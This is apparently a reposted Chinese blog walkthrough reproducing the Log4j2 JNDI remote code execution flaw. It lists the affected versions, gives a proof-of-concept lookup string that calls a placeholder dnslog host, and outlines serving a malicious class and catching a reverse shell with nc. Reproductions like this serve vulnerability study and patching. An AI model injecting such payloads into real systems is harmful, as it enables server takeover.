Apache Log4J2远程代码执行复现

admin 2024年12月28日13:34:23评论3 views字数 524阅读1分44秒阅读模式

本文来自“白帽子社区知识星球”

作者:Mo

Apache Log4J2远程代码执行复现
白帽子社区知识星球
加入星球,共同进步
01
Apache Log4j2

Apache Log4j2 是一个基于 Java 的日志记录工具。该工具重写了 Log4j 框架,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。

在大多数情况下,开发者可能会将用户输入导致的错误信息写入日志中。攻击者利用此特性可通过该漏洞构造GET/POST等请求包,最终触发远程代码执行。

02
 

危害等级

严重

03
影响范围

2.0 <= Apache log4j2 <= 2.14.1

04
POC验证

${jndi:ldap://xxxxx.dnslog.cn/exp}

EXP利用也很简单:

首先生成一个恶意的CLASS

Apache Log4J2远程代码执行复现

Apache Log4J2远程代码执行复现

        可以发现有很明显的请求过来了

        查看NC监听

Apache Log4J2远程代码执行复现

        Shell成功反弹

如果觉得本文不错的话,欢迎加入知识星球,星球内部设立了多个技术版块,目前涵盖“WEB安全”、“内网渗透”、“CTF技术区”、“漏洞分析”、“工具分享”五大类,还可以与嘉宾大佬们接触,在线答疑、互相探讨。

▼扫码关注白帽子社区公众号&加入知识星球▼

Apache Log4J2远程代码执行复现
Apache Log4J2远程代码执行复现

原文始发于微信公众号(白帽子社区):Apache Log4J2远程代码执行复现

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年12月28日13:34:23
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Apache Log4J2远程代码执行复现https://cn-sec.com/archives/670534.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息